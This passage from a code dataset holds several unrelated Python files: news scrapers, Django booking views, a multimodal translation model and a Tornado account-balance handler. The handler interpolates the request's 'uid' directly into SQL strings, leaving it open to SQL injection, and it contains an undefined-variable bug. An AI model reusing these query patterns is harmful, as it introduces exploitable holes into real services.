bs.select(\"span#viewcontent_inner\")[0].text.encode('utf-8','ignore').decode('utf-8') #깨진문자가 있다면 이과정에서 무시된다.\n elif len(bs.select(\"div.left > p > a > img\")) > 0:\n # 사진 기사\n \"\"\"\"\"\"\n return_val =2\n elif len(bs.select('h4.newstitle')) > 0 :\n title = bs.select(\"h4.newstitle\")[0].text\n\n base_dtm = bs.select(\"p.newsdate\")[0].text.split('|')[1].replace('.','-').strip()\n contents = bs.select(\"span#viewcontent_inner\")[0].text\n\n\n elif news_site == 'mk':\n text = res.text.encode('latin-1').decode('cp949')\n bs = BeautifulSoup(text, 'html.parser')\n title = bs.select(\"div#top_header > div > div > h1\")[0].text\n\n base_dtm = bs.select(\"div#top_header > div > div > div.news_title_author > ul > li.lasttime\")[0].text.split(' :')[1].strip().replace('.','-')\n contents = bs.select(\"div#article_body\")[0].text\n\n elif news_site == 'fnnews':# finanncial news\n text = res.text\n bs = BeautifulSoup(text, 'html.parser')\n title = bs.select(\"div#container > div > div.article_head > h1\")[0].text\n\n base_dtm = bs.select(\"div#container > div > div.article_head > div > em\")[1].text.split(' : ')[1].replace('.','-')\n contents = bs.select(\"div#article_content > div\")[0].text\n\n elif news_site == 'hankyung':# 한국경제\n # 얘네는 응답이 chunked reponse로 온다.\n # 이경우\n # [byte수]\\r\\n\n # 데이터\n # \\r\\n[byte수]\\r\\n\n # 데이터\n # 반복...\n # \\r\\n0\\r\\n\\r\\n\n\n type = None\n if res.text.startswith(' div.artlcle_top > h2.tit')[0].text\n\n base_dtm = bs.select('div#container > div.wrap_container > div > div.info_article > div.date > span')[0].text[3:]\n contents = bs.select('div#newsView')[0].text\n\n elif type == 'hei':\n title = bs.select('div#container > section > h1')[0].text\n base_dtm = bs.select('div#container > section > div > div.atc-info > span')[0].text[3:]\n\n contents = bs.select('article#newsView')[0].text\n elif type == 'plus':\n title = bs.select('section#container > section.service_cnt > article > article > header > h2')[0].text\n base_dtm = bs.select('section#container > section.service_cnt > article > article > p.info > span')[1].text\n\n contents = bs.select('div.articleContent')[0].text\n\n elif news_site == 'newspim':# newspim\n if not res is None :\n text = res.text\n\n if '/anda/view' in text:\n return_val = 2 # no need to download, premium news\n elif \"document.location.href='/';\" in text:\n return_val = 2 # article is not exists\n else :\n bs = BeautifulSoup(text, 'html.parser')\n title = bs.select(\"div.bodynews_title > h1\")[0].text\n\n base_dtm = bs.select(\"div.bodynews_title > ul > li.writetime\")[0].text.split(' : ')[1].replace('년','-').replace('월','-').replace('일','')\n contents = bs.select(\"div#news_contents\")[0].text\n else:\n # 404 not found\n return_val = 3\n\n elif news_site == 'etoday':# etoday\n text = res.text\n if '��스가 존재하지 않습니다' in text:\n return_val = 3\n else:\n try:\n bs = BeautifulSoup(text, 'lxml')\n title = bs.select(\"#article_title\")[0].text\n\n base_dtm = bs.select(\"#ViewHeader > div.byline > em\")[0].text.split(' : ')[1]\n if len(bs.select(\"#newsContent\")) > 0 :\n contents = bs.select(\"#newsContent\")[0].text.strip()\n else:\n contents = bs.select(\"#block_body > div > div > div.cont_left_article\")[0].text.strip()\n except:\n # 일단 패스\n continue\n\n elif news_site == 'yonhapnews':#yonhapnews\n if '/photos/' in res.url: #사진 기사일경우 스크랩하지 않는다.\n return_val = 2\n else:\n text = res.content.decode()\n bs = BeautifulSoup(text, 'html.parser')\n title = bs.select(\"#articleWrap > h1\")[0].text\n\n base_dtm = bs.select(\"div.share-info > span > em\")[0].text.replace('/','-')\n contents = bs.select(\"#articleWrap > div.article\")[0].text\n\n elif news_site == 'biz.chosun':# biz chosun\n if res.text.startswith('\n next_url = res.text.split('url=')[1][:-3]\n res = requests.get(next_url)\n text =res.content.decode()\n bs = BeautifulSoup(text, 'html.parser')\n title = bs.select(\"#title_text\")[0].text\n\n base_dtm = bs.select(\"span.date_text\")[0].text.split(' : ')[1].strip().replace('.','-')\n contents = bs.select(\"#par\")[0].text\n\n else :\n text =res.content.decode()\n bs = BeautifulSoup(text, 'html.parser')\n\n if bs.select('head > title')[0].text == '404 Not Found':\n return_val = 3\n\n else:\n title = bs.select(\"#title_text\")[0].text\n base_dtm = bs.select(\"#date_text\")[0].text.split(' : ')[1].strip().replace('.','-')\n contents = bs.select(\"#article_2011\")[0].text\n\n elif news_site == 'ajunews': # ajunews\n text = res.text\n bs = BeautifulSoup(text, 'html.parser')\n\n if len(bs.select('body > div > div.etc-body > div.etc-url-error-desc > div')) > 0 :\n # 페이지를 찾을 수 없음\n return_val = 3\n else:\n try:\n title = bs.select(\"div.ma680-0001-head-block > h2\")[0].text.strip()\n base_dtm = bs.select(\"li.regi_date.cus\")[0].text.split(' : ')[1]\n if len(bs.select(\"#articleBody > div\")) > 0 :\n contents = bs.select(\"#articleBody > div\")[0].text.strip()\n elif len(bs.select(\"#articleBody\")) > 0 :\n contents = bs.select(\"#articleBody\")[0].text.strip()\n except :\n continue\n\n elif news_site == 'thebell':\n # http://www.thebell.co.kr/front/free/contents/news/article_view.asp?svccode=&page=1&sort=thebell_check_time&key=201309060100009530000521\n next_url = 'http://www.thebell.co.kr/front/free/contents/news/article_view.asp?svccode=&page=1&sort=thebell_check_time&key=' + url_qry.get('key')[0]\n res = requests.get(next_url)\n\n text = res.text\n bs = BeautifulSoup(text, 'html.parser')\n if len( bs.select(\"#article_main > span > b\")) > 0 and '유료' in bs.select(\"#article_main > span > b\")[0].text:\n return_val = 3 # no need to downlaod\n else:\n title = bs.select(\"li.title > h1\")[0].text.strip()\n base_dtm = bs.select(\"div.title_bar > ul > li.left\")[0].text.split('공개 ')[-1]\n contents = bs.select(\"#article_main\")[0].text.strip()\n\n elif news_site == 'seoulfn':\n # http://www.seoulfn.com/news/articleView.html?idxno=39351&ion=section4\n text = res.text.encode('latin-1').decode('cp949')\n bs = BeautifulSoup(text, 'html.parser')\n if len(bs.select(\"td > b\"))>0 and bs.select(\"td > b\")[0].text.startswith('존재하지') :\n return_val = 3\n elif len(bs.select(\"div.phtit\")) > 0 :\n #photo news\n return_val = 2\n else:\n title = bs.select(\"#font_title\")[0].text.strip()\n base_dtm = bs.select(\"#font_date > span\")[0].text.strip()[:20].replace('  ',' ')#space 아님\n contents = bs.select(\"#CmAdContent\")[0].text.strip()\n\n\n else:\n print(\"Unknown news site. FATAL ERROR\")\n exit(-1)\n\n if return_val == 1:\n sub_dir = base_dtm[0:4]\n if not os.path.isdir(\"articles/\" + sub_dir):\n os.mkdir(\"articles/\" + sub_dir)\n dest_file = \"articles/\" + sub_dir + \"/\" + dir_postfix\n\n if not os.path.isfile(dest_file) or ( os.path.isfile(dest_file) and os.stat(dest_file).st_size == 0 ):\n f = open(dest_file,'w',encoding=\"utf-8\")\n f.write(title+\"\\n\"+ base_dtm+\"\\n\"+ contents)\n f.close()\n\n # is_downloaeded\n # 0: not downloaded\n # 1: downloaeded\n # 2: not need to download\n # 3: 404 not found\n qry = \"UPDATE article_title set is_downloaded = %d where id = %d ;\" % (return_val, row[0])\n cur.execute(qry)\n conn.commit()\n else:\n # is_downloaeded\n # 0: not downloaded\n # 1: downloaeded\n # 2: not need to download\n # 3: 404 not found\n qry = \"UPDATE article_title set is_downloaded = %d where id = %d ;\" % (return_val, row[0])\n cur.execute(qry)\n conn.commit()\n\n\n\n\n\n\n\n","sub_path":"2_ncc.py","file_name":"2_ncc.py","file_ext":"py","file_size_in_byte":24192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"60165319","text":"from datetime import datetime\n\nfrom django.conf import settings\nfrom django.core.files.storage import default_storage\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework import generics, status\nfrom rest_framework.decorators import action, detail_route, permission_classes,list_route\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.mixins import UpdateModelMixin\nfrom rest_framework.pagination import LimitOffsetPagination\nfrom rest_framework.parsers import FormParser, JSONParser, MultiPartParser\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ModelViewSet\n\nfrom mrelife.commons.common_fnc import CommonFuntion\nfrom mrelife.events.models import Event, EventModelHouse\nfrom mrelife.modelhouses.models import (\n ModelHouse,\n ModelHouseMedia,\n ModelHouseOutletStore,\n ModelHouseTag,\n ModelHouseUser,\n OrderModelHouse\n)\nfrom mrelife.modelhouses.serializers import (\n ModelHouseNestedSerializer,\n ModelHouseSerializer,\n OrderModelHouseSerializer,\n OrderModelHouseStatusSerializer\n)\nfrom mrelife.outletstores.models import OutletStore\nfrom mrelife.tags.models import Tag\nfrom mrelife.utils.groups import GroupUser, IsAdmin, IsStore, IsSub\nfrom mrelife.utils.model_house_permission import ModelHousePermission\nfrom mrelife.utils.order_model_house_permission import OrderMHUserListPermission, OrderMHViewadminPermission\nfrom mrelife.utils.querys import get_or_none\nfrom mrelife.utils.relifeenum import MessageCode\n\n\nclass ModelHouseViewSet(ModelViewSet):\n queryset = ModelHouse.objects.all()\n serializer_class = ModelHouseSerializer\n permission_classes = (IsAuthenticated, ModelHousePermission,)\n parser_class = (FormParser, MultiPartParser, JSONParser)\n pagination_class = LimitOffsetPagination\n\n def create(self, request, *args, **kwargs):\n \"\"\"\n POST:\n store: int\n events: []\n tags: []\n medias: []\n \"\"\"\n request.data['create_user'] = request.user.id\n obj = super(ModelHouseViewSet, self).create(request, *args, **kwargs)\n house = ModelHouse.objects.get(pk=obj.data['id'])\n if not (IsStore(request.user) or IsSub(request.user)):\n try:\n store = OutletStore.objects.get(pk=int(request.data.get('store')))\n except Exception:\n store = None\n else:\n store = request.user.store\n ModelHouseUser.objects.create(user_id=request.user.id, model_house=house)\n\n if store is None:\n house.delete()\n return Response({\n 'status': False,\n 'messageCode': 'MH001',\n 'messageParams': {},\n 'data': {}\n }, status=status.HTTP_404_NOT_FOUND)\n\n events = request.data.get('events')\n if events is not None:\n for event in events:\n try:\n EventModelHouse.objects.create(event_id=event, model_house=house)\n except Exception:\n pass\n\n tags = request.data.get('tags')\n if tags is not None:\n for tag_name in tags:\n if not (tag_name == '' or tag_name is None):\n tag, created = Tag.objects.get_or_create(name=tag_name)\n ModelHouseTag.objects.create(tag=tag, model_house=house)\n\n ModelHouseOutletStore.objects.create(outlet_store=store, model_house=house)\n\n medias = request.data.getlist('medias')\n count = 0\n for media in medias:\n if count < 5:\n file = default_storage.save(media.name, media)\n ModelHouseMedia.objects.create(model_house=house, url=settings.MEDIA_URL + file)\n count += 1\n return obj\n\n def retrieve(self, request, *args, **kwargs):\n self.serializer_class = ModelHouseNestedSerializer\n return super(ModelHouseViewSet, self).retrieve(request, *args, **kwargs)\n\n def update(self, request, *args, **kwargs):\n obj = super(ModelHouseViewSet, self).update(request, *args, **kwargs)\n return obj\n\n @detail_route(methods=['post'])\n def add_event(self, request, *args, **kwargs):\n \"\"\"\n POST:\n events: []\n \"\"\"\n house = ModelHouse.objects.get(pk=kwargs['pk'])\n events = request.data.get('events')\n if events is not None:\n for event in events:\n try:\n if not house.events.filter(event_id=event).exists():\n EventModelHouse.objects.create(event_id=event, model_house=house)\n except Exception:\n pass\n return super(ModelHouseViewSet, self).retrieve(request, *args, **kwargs)\n\n @detail_route(methods=['post'])\n def remove_event(self, request, *args, **kwargs):\n \"\"\"\n POST:\n events: []\n \"\"\"\n house = ModelHouse.objects.get(pk=kwargs['pk'])\n events = request.data.get('events')\n if events is not None:\n for event in events:\n try:\n _event = EventModelHouse.objects.filter(event_id=event, model_house=house)\n _event.delete()\n except Exception:\n pass\n return super(ModelHouseViewSet, self).retrieve(request, *args, **kwargs)\n\n @detail_route(methods=['post'])\n def add_tag(self, request, *args, **kwargs):\n \"\"\"\n POST:\n tags: []\n \"\"\"\n house = ModelHouse.objects.get(pk=kwargs['pk'])\n tags = request.data.get('tags')\n if tags is not None:\n for tag_name in tags:\n if not (tag_name == '' or tag_name is None):\n tag, created = Tag.objects.get_or_create(name=tag_name)\n if created or not house.tags.filter(tag=tag).exists():\n ModelHouseTag.objects.create(tag=tag, model_house=house)\n return super(ModelHouseViewSet, self).retrieve(request, *args, **kwargs)\n\n @detail_route(methods=['post'])\n def remove_tag(self, request, *args, **kwargs):\n \"\"\"\n POST:\n tags: []\n \"\"\"\n house = ModelHouse.objects.get(pk=kwargs['pk'])\n tags = request.data.get('tags')\n if tags is not None:\n for tag in tags:\n try:\n _tag = ModelHouseTag.objects.filter(tag_id=tag, model_house=house)\n _tag.delete()\n except Exception:\n pass\n return super(ModelHouseViewSet, self).retrieve(request, *args, **kwargs)\n\n @detail_route(methods=['post'])\n def add_media(self, request, *args, **kwargs):\n \"\"\"\n POST:\n medias: []\n \"\"\"\n house = ModelHouse.objects.get(pk=kwargs['pk'])\n medias = request.data.getlist('medias')\n count = 0\n for media in medias:\n if count < 5:\n file = default_storage.save(media.name, media)\n ModelHouseMedia.objects.create(model_house=house, url=settings.MEDIA_URL + file)\n count += 1\n return super(ModelHouseViewSet, self).retrieve(request, *args, **kwargs)\n\n @detail_route(methods=['post'])\n def remove_media(self, request, *args, **kwargs):\n \"\"\"\n POST:\n medias: []\n \"\"\"\n house = ModelHouse.objects.get(pk=kwargs['pk'])\n medias = request.data.get('medias')\n if medias is not None:\n for media in medias:\n try:\n _media = ModelHouseMedia.objects.get(pk=media)\n _media.delete()\n except Exception:\n pass\n return super(ModelHouseViewSet, self).retrieve(request, *args, **kwargs)\n\n @detail_route(methods=['post'])\n def add_user(self, request, *args, **kwargs):\n \"\"\"\n GET:\n POST:\n \"\"\"\n house = ModelHouse.objects.get(pk=kwargs['pk'])\n users = request.data.get('users')\n if users is not None:\n for user in users:\n try:\n if not house.users.filter(user_id=user).exists():\n ModelHouseUser.objects.create(user_id=request.user.id, model_house=house)\n except Exception:\n pass\n return super(ModelHouseViewSet, self).retrieve(request, *args, **kwargs)\n\n @detail_route(methods=['post'])\n def remove_user(self, request, *args, **kwargs):\n \"\"\"\n POST:\n users: [int]\n \"\"\"\n house = ModelHouse.objects.get(pk=kwargs['pk'])\n users = request.data.get('users')\n if users is not None:\n for user in users:\n try:\n _user = ModelHouseUser.objects.filter(user_id=user, model_house=house)\n _user.delete()\n except Exception:\n pass\n return super(ModelHouseViewSet, self).retrieve(request, *args, **kwargs)\n\n\nclass OrderModelHouseViewSet(ModelViewSet):\n queryset = OrderModelHouse.objects.all().filter(is_active=1)\n serializer_class = OrderModelHouseSerializer\n pagination_class = LimitOffsetPagination\n permission_classes = (IsAuthenticated, OrderMHViewadminPermission,)\n\n \n def list(self, request):\n self.queryset = OrderModelHouse.objects.filter(is_active=1)\n return super(OrderModelHouseViewSet, self).list(request)\n \n\n \n def retrieve(self, request, pk=None):\n try:\n queryset = OrderModelHouse.objects.all().filter(is_active=1)\n orderModelObject = get_object_or_404(queryset, pk=pk)\n serializer = OrderModelHouseSerializer(orderModelObject)\n return Response(CommonFuntion.resultResponse(True, serializer.data, MessageCode.OMH002.value, \"\"), status=status.HTTP_200_OK)\n except Exception as e:\n return Response(CommonFuntion.resultResponse(False, \"\", MessageCode.OMH003.value, \"\"), status=status.HTTP_404_NOT_FOUND)\n\n \n def create(self, request):\n request.data['create_user_id'] = request.user.id\n serializer = OrderModelHouseSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save(is_active=settings.IS_ACTIVE, created=datetime.now(), updated=datetime.now())\n return Response(CommonFuntion.resultResponse(True, serializer.data, MessageCode.OMH004.value, \"\"), status=status.HTTP_201_CREATED)\n return Response(CommonFuntion.resultResponse(False, \"\", MessageCode.OMH005.value, serializer.errors), status=status.HTTP_400_BAD_REQUEST)\n\n \n def update(self, request, pk=None):\n try:\n request.data['create_user_id'] = request.user.id\n queryset = OrderModelHouse.objects.all().filter(is_active=1)\n orderModelObject = get_object_or_404(queryset, pk=pk)\n serializer = OrderModelHouseSerializer(orderModelObject, data=request.data)\n if serializer.is_valid():\n serializer.save(is_active=settings.IS_ACTIVE, created=datetime.now(), updated=datetime.now())\n return Response(CommonFuntion.resultResponse(True, serializer.data, MessageCode.OMH006.value, \"\"), status=status.HTTP_200_OK)\n return Response(CommonFuntion.resultResponse(False, \"\", MessageCode.OMH007.value, serializer.errors), status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n return Response(CommonFuntion.resultResponse(False, \"\", MessageCode.OMH007.value, \"\"), status=status.HTTP_404_NOT_FOUND)\n\n \n def destroy(self, request, pk=None):\n try:\n queryset = OrderModelHouse.objects.all().filter(is_active=1)\n orderModelObject = get_object_or_404(queryset, pk=pk)\n data = {\"is_active\": settings.IS_INACTIVE}\n serializer = OrderModelHouseSerializer(orderModelObject, data=data, partial=True)\n if serializer.is_valid():\n serializer.save(updated=datetime.now())\n return Response(CommonFuntion.resultResponse(True, serializer.data, MessageCode.OMH008.value, \"\"), status=status.HTTP_200_NO_CONTENT)\n return Response(CommonFuntion.resultResponse(False, \"\", MessageCode.OMH009.value, serializer.errors), status=status.HTTP_404_BAD_REQUEST)\n except Exception as e:\n return Response(CommonFuntion.resultResponse(False, \"\", MessageCode.OMH007.value, \"\"), status=status.HTTP_404_NOT_FOUND)\n\n @list_route(methods=['get']) \n def selfGetlistBooking(self, request, pk=None):\n queryset = OrderModelHouse.objects.all().filter(is_active=1).filter(create_user_id=request.user.id)\n return super(OrderModelHouseViewSet, self).list(request)\nclass updateStatus(GenericAPIView, UpdateModelMixin):\n queryset = OrderModelHouse.objects.all()\n serializer_class = OrderModelHouseStatusSerializer\n permission_classes = (IsAuthenticated,)\n\n def put(self, request, pk=None, *args, **kwargs):\n try:\n request.data['create_user_id'] = request.user.id\n queryset = OrderModelHouse.objects.all().filter(is_active=1)\n orderModelObject = get_object_or_404(queryset, pk=pk)\n serializer = OrderModelHouseSerializer(orderModelObject, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save(is_active=settings.IS_ACTIVE, created=datetime.now(), updated=datetime.now())\n return Response(CommonFuntion.resultResponse(True, serializer.data, MessageCode.OMH006.value, \"\"), status=status.HTTP_200_OK)\n return Response(CommonFuntion.resultResponse(False, \"\", MessageCode.OMH007.value, serializer.errors), status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n return Response(CommonFuntion.resultResponse(False, \"\", MessageCode.OMH007.value, \"\"), status=status.HTTP_404_NOT_FOUND)\n","sub_path":"service/mrelife/modelhouses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"650382547","text":"from nmtpytorch.layers.transformers.cross_modal_encoder import CrossModalEncoder\nfrom nmtpytorch.models import SimultaneousTFNMT\n\n\nclass EncoderCrossMMSimultaneousTFNMT(SimultaneousTFNMT):\n\n def __init__(self, opts):\n super().__init__(opts)\n assert not self.opts.model['enc_bidirectional'], \\\n 'Bidirectional TF encoder is not currently supported for simultaneous MT.'\n\n def set_defaults(self):\n super().set_defaults()\n self.defaults.update({\n # Decoding/training simultaneous NMT args\n 'enc_fusion': 'sum', # The encoder fusion type.Can be: 'sum' or 'gate'. Default 'sum'.\n 'enc_fusion_lnorm': True, # Whether to apply layer normalization after fusing the encoder.\n 'mm_attn_heads': 8, # The number of multimodal attention heads.\n 'enc_fusion_dropout': 0.0, # The amount of dropout after the fusion.\n })\n\n def _create_image_encoder(self):\n return CrossModalEncoder(\n input_size=self.opts.model['aux_dim'],\n proj_dim=self.opts.model['aux_proj_dim'],\n proj_activ=self.opts.model['aux_proj_activ'],\n layer_norm=self.opts.model['aux_lnorm'],\n l2_norm=self.opts.model['aux_l2norm'],\n dropout=self.opts.model['aux_dropout'],\n feat_mode=self.opts.model['feat_mode'],\n model_dim=self.opts.model['model_dim'],\n mm_attn_heads=self.opts.model['mm_attn_heads'],\n attn_dropout=self.opts.model['attn_dropout'],\n fusion=self.opts.model['enc_fusion'],\n fusion_lnorm=self.opts.model['enc_fusion_lnorm'],\n fusion_dropout=self.opts.model['enc_fusion_dropout'],\n boxes_dim=self.opts.model['img_boxes_dim']\n )\n\n def get_attention_weights(self):\n return {'encoder_src': self.encoders['src'].get_attention_weights(),\n 'encoder_img': self.encoders['image'].get_attention_weights(),\n 'decoder': self.dec.get_attention_weights()}\n\n def cache_enc_states(self, batch, **kwargs):\n \"\"\"\n Caches the encoder hidden states, by first computing the textual hidden states, and then combining them with the\n visual encoder using the cross modal encoder.\n :param batch: The batch.\n :param kwargs: Any additional args.\n \"\"\"\n enc_txt = self.encoders['src'](batch['src'])\n _ = self.encoders['image'](batch['image'], enc_txt=enc_txt)\n\n def get_enc_state_dict(self, up_to=int(1e6)):\n \"\"\"\n Get the encoder states. In the cross modal case retrive the ones from the cross modal image encoder, as they\n also contain the textual encoder hidden states.\n :param up_to: The amount of timesteps to return.\n :return: The encoder states up to a certain timestep.\n \"\"\"\n return {'src': self.encoders['image'].get_states(up_to=up_to)}\n","sub_path":"nmtpytorch/models/snmt_tf_enc_cmm.py","file_name":"snmt_tf_enc_cmm.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"5219389","text":"# -*- coding: utf-8 -*\r\nfrom util import validate_date_str\r\nimport tornado.web\r\nfrom datetime import datetime, timedelta\r\nimport json\r\n\r\nclass UpdateBalanceHandler(tornado.web.RequestHandler):\r\n @property\r\n def logger(self):\r\n return self.application.logger\r\n\r\n @property\r\n def mysql_db(self):\r\n return self.application.mysql_db\r\n\r\n @property\r\n def redis_client(self):\r\n return self.application.redis_client\r\n\r\n def stats_curday_balance(self, uid, start_tme, end_time):\r\n data = {\"order_balance\": None, \"cancel_balance\": None, \"updateTime\": None}\r\n\r\n sql = \"select sum(ticketPrices),updateTime from order_ticket where uid='%s' \\\r\n and status=1 and updateTime>='%s' and updateTime<'%s'\" % (uid, start_tme, end_time)\r\n qs, err = self.mysql_db.execute_query_sql(sql)\r\n if err is not None:\r\n return data, err\r\n\r\n self.logger.info(\"order balance: %s\" % str(qs))\r\n if qs is None or len(qs) == 0:\r\n return data, None\r\n\r\n data[\"order_balance\"] = qs[0][0]\r\n data[\"updateTime\"] = qs[0][1].strftime(\"%Y-%m-%d %H:%M:%S\")\r\n\r\n sql = \"select sum(ticketPrices),updateTime from order_cancel where uid='%s' \\\r\n and cancelStatus=1 and updateTime>='%s' and updateTime<'%s'\" % (uid, start_tme, end_time)\r\n qs, err = self.mysql_db.execute_query_sql(sql)\r\n if err is not None:\r\n return data, err\r\n\r\n self.logger.info(\"cancel balance: %s\" % str(qs))\r\n if qs is None or len(qs) == 0:\r\n return data, None\r\n\r\n data[\"cancel_balance\"] = qs[0][0]\r\n data[\"updateTime\"] = qs[0][1].strftime(\"%Y-%m-%d %H:%M:%S\")\r\n\r\n return data, None\r\n\r\n def cmp_update_time(self, update_time, start_time, end_time):\r\n s_time = datetime.strptime(update_time.strftime(\"%Y-%m-%d\"), \"%Y-%m-%d\")\r\n stime = datetime.strptime(start_time.split(\" \")[0], \"%Y-%m-%d\")\r\n etime = datetime.strptime(end_time.split(\" \")[0], \"%Y-%m-%d\")\r\n\r\n self.logger.info(\"s_time:%s stime: %s etime:%s\" % (s_time, stime, etime))\r\n if s_time >= stime or s_time >= etime:\r\n return True\r\n return False\r\n\r\n def valid_reqeust_time(self, start_time, end_time):\r\n if validate_date_str(start_time, \"%Y-%m-%d %H:%M:%S\") == False or \\\r\n validate_date_str(end_time, \"%Y-%m-%d %H:%M:%S\") == False:\r\n return True\r\n\r\n c1 = datetime.strptime(start_time, \"%Y-%m-%d %H:%M:%S\")\r\n c2 = datetime.strptime(end_time, \"%Y-%m-%d %H:%M:%S\")\r\n\r\n self.logger.info(\"c1:%s c2:%s\" % (c1, c2))\r\n if c1 + timedelta(days=1) < c2 or c1 > c2:\r\n return True\r\n return False\r\n\r\n def get(self):\r\n self.logger.info(\"%s%s?%s\" % (self.request.host, self.request.path, self.request.query))\r\n\r\n uid = self.get_argument(\"uid\", default=None, strip=True)\r\n start_time = self.get_argument(\"start_time\", default=None, strip=True)\r\n end_time = self.get_argument(\"end_time\", default=None, strip=True)\r\n\r\n self.set_header(\"Content-Type\", \"application/json;charset=UTF-8\")\r\n if uid is None or start_time is None or end_time is None:\r\n self.write({\"errcode\": -1, \"errmsg\": r\"时间参数错误\", \"data\": {}})\r\n self.finish()\r\n return\r\n\r\n if self.valid_reqeust_time(start_time, end_time):\r\n self.logger.error(r\"时间参数越界\")\r\n self.write({\"errcode\": -1, \"errmsg\": r\"时间参数越界\", \"data\": {}})\r\n self.finish()\r\n return\r\n\r\n sql = \"select totalBalance,updateTime from account_balance where uid='%s' order by updateTime desc limit 1\" % uid\r\n qs, err = self.mysql_db.execute_query_sql(sql)\r\n if err is not None:\r\n self.write({\"errcode\": -1, \"errmsg\": str(err), \"data\": {}})\r\n self.finish()\r\n return\r\n\r\n if qs is None or len(qs) == 0:\r\n self.write({\"errcode\": -1, \"errmsg\": r\"非法uid\", \"data\": {}})\r\n self.finish()\r\n return\r\n\r\n total_balance = qs[0][0]\r\n update_time = qs[0][1]\r\n\r\n self.logger.info(\"total balance: %s update_time:%s\" % (total_balance, update_time))\r\n if self.cmp_update_time(update_time, start_time ,end_time) == True:\r\n self.logger.info(r\"己经更新过余额\")\r\n self.write({\"errcode\": 0, \"errmsg\": r\"己经更新过余额\", \"data\": {}})\r\n self.finish()\r\n return\r\n\r\n data, err = self.stats_curday_balance(uid, start_time, end_time)\r\n if err is not None:\r\n self.logger.info(err)\r\n self.write({\"errcode\": -1, \"errmsg\": str(err), \"data\": {}})\r\n self.finish()\r\n return\r\n\r\n self.logger.info(\"query balance: %s\" % json.dumps(data))\r\n if data[\"order_balance\"] is None and data[\"cancel_balance\"] is None:\r\n self.logger.info(\"%s-%s无交易余额\" % (start_tme, end_time))\r\n self.write({\"errcode\": 0, \"errmsg\": \"%s-%s无交易余额\" % (start_tme, end_time), \"data\": {}})\r\n self.finish()\r\n return\r\n\r\n trans_balance = 0.0\r\n if data[\"order_balance\"] is not None:\r\n trans_balance = float(data[\"order_balance\"])\r\n\r\n if data[\"cancel_balance\"] is not None:\r\n trans_balance = trans_balance - float(data[\"cancel_balance\"])\r\n\r\n balance = total_balance - trans_balance\r\n self.logger.info(\"total_balance: %f trans_balance: %f balance: %f\" % (total_balance, trans_balance, balance))\r\n hdata = {\r\n \"totalBalance\": balance,\r\n \"lastTransMoney\": trans_balance,\r\n \"uid\": uid,\r\n \"updateTime\": datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\r\n \"statsTime\": data[\"updateTime\"],\r\n \"operator\": 1\r\n }\r\n\r\n self.logger.info(\"hdata: %s\" % json.dumps(hdata))\r\n\r\n if self.redis_client.hset(\"ticket-uid\", uid, balance) == False:\r\n self.logger.info(r\"更新交易余额失败\")\r\n self.write({\"errcode\": -1, \"errmsg\": r\"更新交易余额失败\", \"data\": hdata})\r\n self.finish()\r\n return\r\n\r\n if self.redis_client.set(\"ticket_balance_uid_%s\" % uid, balance) is None:\r\n self.logger.info(r\"更新缓存余额失败\")\r\n self.write({\"errcode\": -1, \"errmsg\": r\"更新缓存余额失败\", \"data\": hdata})\r\n self.finish()\r\n return\r\n\r\n if self.mysql_db.insert(\"account_balance\", hdata) is not None:\r\n self.logger.info(r\"更新余额失败\")\r\n self.write({\"errcode\": -1, \"errmsg\": r\"更新余额失败\", \"data\": hdata})\r\n self.finish()\r\n return\r\n\r\n if balance < 0.0:\r\n self.logger.info(r\"余额不足\")\r\n self.write({\"errcode\": 0, \"errmsg\": r\"余额不足\", \"data\": hdata})\r\n else:\r\n self.logger.info(r\"交易正常\")\r\n self.write({\"errcode\": 0, \"errmsg\": r\"交易正常\", \"data\": hdata})\r\n self.finish()\r\n\r\n self.logger.info(\"=====================end\")\r\n","sub_path":"3rd_party/nginx.bak/home/work/ticket_server/admin_update_balance.py","file_name":"admin_update_balance.py","file_ext":"py","file_size_in_byte":7202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"573994953","text":"import re\n\nimport lxml\nfrom selenium import webdriver\n\nlink_url = \"https://www.baidu.com/bh/dict/ydxx_8158835209873076610?tab=%E6%A6%82%E8%BF%B0&title=%E8%82%9D%E7%99%8C&contentid=ydxx_8158835209873076610&query=%E8%82%9D%E7%99%8C&sf_ref=dict_home&from=dicta\"\n\ndriver = webdriver.Chrome()\ndriver.maximize_window()\ndriver.get(link_url)\n\n# 获取页面源代码\nhtml_source = driver.page_source\n# 重点\nhtml = lxml.html.fromstring(html_source)\n# 获取标签下所有文本\nitems = html.xpath(\"//div[@id='y_prodsingle']//text()\")\n# 正则 匹配以下内容 \\s+ 首空格 \\s+$ 尾空格 \\n 换行\npattern = re.compile(\"^\\s+|\\s+$|\\n\")\n\nclause_text = \"\"\nfor item in items:\n # 将匹配到的内容用空替换,即去除匹配的内容,只留下文本\n line = re.sub(pattern, \"\", item)\n if len(line) > 0:\n clause_text += line + \"\\n\"\n#\n#\nprint(clause_text)","sub_path":"爬虫/selenium爬虫.py","file_name":"selenium爬虫.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"57358318","text":"# https://towardsdatascience.com/15-things-you-should-know-about-dictionaries-in-python-44c55e75405c\n''' 1. What is a Python dictionary?\nA dictionary is an unordered and mutable Python container that stores mappings of unique keys to values. Dictionaries are written with curly brackets ({}), including key-value pairs separated by commas (,). A colon (:) separates each key from its value.\nThree dictionaries are shown below, containing the population of the 5 largest German cities, list of products, and student’s grades.\n'''\n# dictionary containing the population of the 5 largest german cities\npopulation = {'Berlin': 3748148, 'Hamburg': 1822445, 'Munich': 1471508, 'Cologne': 1085664, 'Frankfurt': 753056 